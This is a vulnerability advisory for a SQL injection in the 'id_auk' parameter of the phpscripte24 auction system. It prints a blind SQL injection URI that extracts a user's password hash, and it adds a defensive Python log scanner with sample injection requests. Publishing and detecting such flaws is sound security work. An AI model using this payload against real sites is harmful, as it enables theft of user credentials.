Profi Einzelgebots Auktions System 'id_auk' Parameter SQL Injection Vulnerability
BID:39675
Info
| Bugtraq ID: | 39675 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2010 12:00AM |
| Updated: | Apr 01 2010 12:00AM |
| Credit: | Easy Laster |
| Vulnerable: | phpscripte24 Profi Einzelgebots Auktions System 0 |
| Not Vulnerable: | |
Exploit / POC
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/auktion/auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
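With no vendor patch listed, one stopgap is to flag requests to auktion_text.php whose id_auk value is not a plain integer. The Python sketch below is an added example, not part of the original advisory or the vendor's code; it assumes legitimate id_auk values are decimal integers and that the web server writes combined-format access logs, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate id_auk values are plain decimal integers.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')
SCRIPT = "auktion_text.php"

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2010:10:00:00 +0000] "GET /auktion/auktion_text.php?id_auk=17 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Apr/2010:10:00:05 +0000] "GET /auktion/auktion_text.php?id_auk=1+and+1=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Apr/2010:10:00:06 +0000] "GET /auktion/auktion_text.php?id_auk=1%20and%201%3D2 HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Apr/2010:10:00:09 +0000] "GET /auktion/index.php?id_auk=x HTTP/1.1" 200 900',
]


def suspicious_id_auk(uri):
    """Return the decoded id_auk values in `uri` that are not integers."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/" + SCRIPT):
        return []  # only the script named in the advisory is in scope
    # parse_qs decodes %XX and '+', and keeps repeated parameters,
    # so encoded and duplicated values are checked as the script sees them.
    values = parse_qs(parts.query, keep_blank_values=True).get("id_auk", [])
    return [v for v in values if not VALID_ID.fullmatch(v)]


def scan(log_lines):
    """Yield (client_ip, bad_values) for each log line with a bad id_auk."""
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        bad = suspicious_id_auk(match.group(1))
        if bad:
            yield line.split(" ", 1)[0], bad


if __name__ == "__main__":
    for client, values in scan(SAMPLE_LOG):
        print(client, values)
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) until the script itself validates the parameter.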